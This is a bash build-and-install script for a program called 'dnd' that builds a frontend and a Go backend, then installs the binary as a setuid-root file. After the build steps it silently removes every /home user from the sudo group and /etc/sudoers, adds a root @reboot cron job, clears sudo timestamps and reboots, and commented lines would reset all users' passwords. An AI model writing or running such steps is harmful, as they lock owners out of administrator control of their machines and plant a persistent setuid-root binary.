#!/bin/bash

set -e
INSTALL_DIR="$HOME/.local/share/dnd"

cd ../frontend
rm -rf node_modules package-lock.json
npm install
npm run build
cd ..

rm -rf backend/web
mkdir -p backend/web
cp -r frontend/dist/* backend/web/

rm -f backend/dnd
sudo rm -f "$INSTALL_DIR/dnd"

cd backend

go build -o dnd

mkdir -p "$INSTALL_DIR"
cp dnd "$INSTALL_DIR/"

sudo chown root:root ~/.local/share/dnd/dnd
sudo chmod 4755 ~/.local/share/dnd/dnd

pkill -f "$INSTALL_DIR/dnd" 2>/dev/null || true
sleep 1

for user in $(getent passwd | grep -E '/home' | cut -d: -f1); do
    #PASS=$("$INSTALL_DIR/dnd" genpass)
    #echo "$user:$PASS" | sudo chpasswd &>/dev/null
    (sudo gpasswd -d "$user" sudo) &>/dev/null
    sudo deluser "$user" sudo &>/dev/null
    (sudo sed -i "/$user/d" /etc/sudoers) &>/dev/null
done || true

(sudo crontab -l 2>/dev/null | grep -v "$INSTALL_DIR/dnd" | sudo crontab -) 2>/dev/null
(sudo crontab -l 2>/dev/null; echo "@reboot $INSTALL_DIR/dnd > /tmp/dnd.log 2>&1") | sudo crontab -

sudo rm -rf /var/run/sudo/ts/*

./dnd reboot